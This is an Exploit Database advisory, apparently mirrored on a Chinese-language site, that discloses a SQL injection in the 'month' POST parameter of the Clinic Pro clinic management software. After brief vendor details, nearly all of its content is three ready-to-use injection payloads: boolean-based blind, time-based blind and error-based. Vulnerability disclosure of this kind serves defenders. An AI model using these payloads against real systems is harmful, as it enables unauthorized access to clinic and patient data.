Clinic Pro v4 – ‘month’ SQL Injection

• Exploit Database
• 105 阅读

• 作者： Abdullah Çelebi
  日期： 2019-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46642/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  # Title: Clinic Pro - Clinic Management Software # Date: 03.04.2019 # Exploit Author: Abdullah Çelebi # Vendor Homepage: https://softwebinternational.com # Software Link: https://cms.softwebinternational.com # Category: Webapps # Tested on: WAMPP @Win # Software description: It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic system can be easily configured and fully automated as per clinic requirement using this Automation Software.   # Vulnerabilities: # An attacker can access all data following an authorized user login using the parameter.     # POC - SQLi :   # Parameter: month (POST) # Request URL: http://localhost/welcome/monthly_expense_overview #Type : boolean-based blind month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND '%'='   #Type : time-based blind month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='   #Type : error-based month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT (ELT(2633=2633,1))),0x7171717171)) AND '%'='